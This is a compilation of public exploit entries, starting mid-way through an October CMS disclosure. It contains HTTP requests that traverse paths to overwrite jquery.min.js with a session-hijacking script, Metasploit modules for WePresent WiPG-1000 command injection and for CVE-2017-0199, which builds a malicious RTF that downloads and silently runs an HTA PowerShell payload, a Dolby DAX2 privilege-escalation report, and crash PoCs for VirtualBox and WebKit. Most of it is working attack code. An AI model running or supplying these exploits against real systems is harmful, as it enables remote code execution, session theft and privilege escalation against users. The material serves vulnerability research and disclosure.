the server that does not exist or the attacker manages to delete the file
beforehand. When an attacker creates a new asset, then the following request
is made.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=test.js&content=test&templateType=asset&theme=demo
==================== request end ====================
The parameter fileName isn't validated and allows an attacker to specify an
path where the file should be saved to. Overwriting files is forbidden.
If we
specify the file name as ../../../test.js then we can assert that the
file is
created at the root of site's web directory.
We can execute JavaScript by combining this issue with file deletion
vulnerability via POI. For that, we are going to replace the
modules/backend/
assets/js/vendor/jquery.min.js file with our own content. It is loaded
on the
page for every authenticated user and allows us as an attacker to take
control
of their session. The payload for this example is the following:
==================== source start ========================
var c = new XMLHttpRequest();
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
c.onreadystatechange = () => eval(c.responseText);
c.send();
var h = () => {location.hash = 'Hacked: ' + (new Date())};
setInterval(h, 1000);
==================== source end ========================
After we delete the jquery.min.js file on the server, we create a new asset
with the payload as the content.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 371
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
var+c+%3d+new+XMLHttpRequest()%3b
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
c.send()%3b
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
setInterval(h,+1000)%3b
&templateType=asset&theme=demo
==================== request end ====================
After the victim authenticates, the payload is executed. For this
example, it
changes the URL hash every second, but can be used to take control of the
victims session.
Conclusion
==========
Authenticated user with permission to manage website assets, upload and
manage
media contents or customize back-end settings can use vulnerabilities found
there to execute PHP code on the server and take control of the application.
New release v1.0.413 has been made available as a result:
https://octobercms.com/support/article/rn-8
https://github.com/octobercms/october/releases/tag/v1.0.413.
Timeline
========
05.04.2017 | me > developer | first vulnerability discovered
06.04.2017 | me > developer | initial contact
07.04.2017 | me > developer | sent PoC
09.04.2017 | developer > me | developer implemented patches;
requested additional information
09.04.2017 | me > developer | sent PoC with additional information
and findings
10.04.2017 | developer > me | all issues were patched
11.04.2017 | developer > public | new release
11.04.2017 | me > DWF | CVE request
12.04.2017 | me > public | full disclosure
---
Anti Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'WePresent WiPG-1000 Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in an undocumented
CGI file in several versions of the WePresent WiPG-1000 devices.
Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthias Brun', # Vulnerability Discovery, Metasploit Module
],
'References' =>
[
[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat openssl'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['WiPG-1000 <=2.0.0.7', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 20 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/rdfs.cgi'
})
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'
}
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege
Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
Description:
The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
Proof of Concept:
To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad”
2) Check the currently running processes for the privileged copy of notepad,
Expected Result:
No privilege escalation occurs.
Observed Result:
An instance of notepad is running at system privileges.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
>VirtualBoxKiller.exe E:\
Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
--- cut ---
3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---
The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
--- cut ---
1: kd> g
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x2f:
0033:00000000`76f3f22f cc int 3
1: kd> kb
RetAddr : Args to Child : Call Site
00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
--- cut ---
1: kd> g
=======================================
VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed.
000000000DCB1000 : Heap handle for the heap owning the block.
000000001C37E000 : Heap block being freed again.
0000000000000000 : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
1: kd> kb
RetAddr : Args to Child : Call Site
000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#include <time.h>
extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_ PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ BOOLEAN ReturnSingleEntry,
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan
);
typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
int main(int argc, char **argv) {
// Validate command line format.
if (argc != 2) {
printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
return 1;
}
// Initialize the PRNG.
srand((unsigned int)time(NULL));
// Create a subdirectory dedicated to demonstrating the vulnerability.
CHAR TmpDirectoryName[MAX_PATH];
_snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
printf("CreateDirectory failed, %d\n", GetLastError());
return 1;
}
// Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
CONST UINT kTempFilesCount = 16;
CONST UINT kTempFilenameLength = 128;
CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
memset(TmpFilename, 'A', kTempFilenameLength);
TmpFilename[kTempFilenameLength] = '\0';
for (UINT i = 0; i < kTempFilesCount; i++) {
_snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("CreateFile#1 failed, %d\n", GetLastError());
return 1;
}
CloseHandle(hFile);
}
// Open the temporary directory.
HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDirectory == INVALID_HANDLE_VALUE) {
printf("CreateFile#2 failed, %d\n", GetLastError());
return 1;
}
IO_STATUS_BLOCK iosb;
FILE_DIRECTORY_INFORMATION fdi;
// Perform the first call, with ReturnSingleEntry set to FALSE.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);
// Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);
// We should never reach here.
CloseHandle(hDirectory);
return 0;
}
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095
There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.
In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:
unsigned newLength = startIndex + otherLength;
If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.
It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented, however if both arrays involved in the concatenation are of type ArrayWithUndecided JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.
Arrays of type ArrayWithUndecided are usually of length 0, however, it is possible to create one by calling Array.splice on an array with all undefined elements. This will cause an undefined Array of the delete length to be allocated, and then returned without it being written to, which would cause it to decide its type.
A minimal PoC is as follows, and a full PoC is attached.
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
-->
<html>
<body>
<script>
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
</script>
</body>
</html>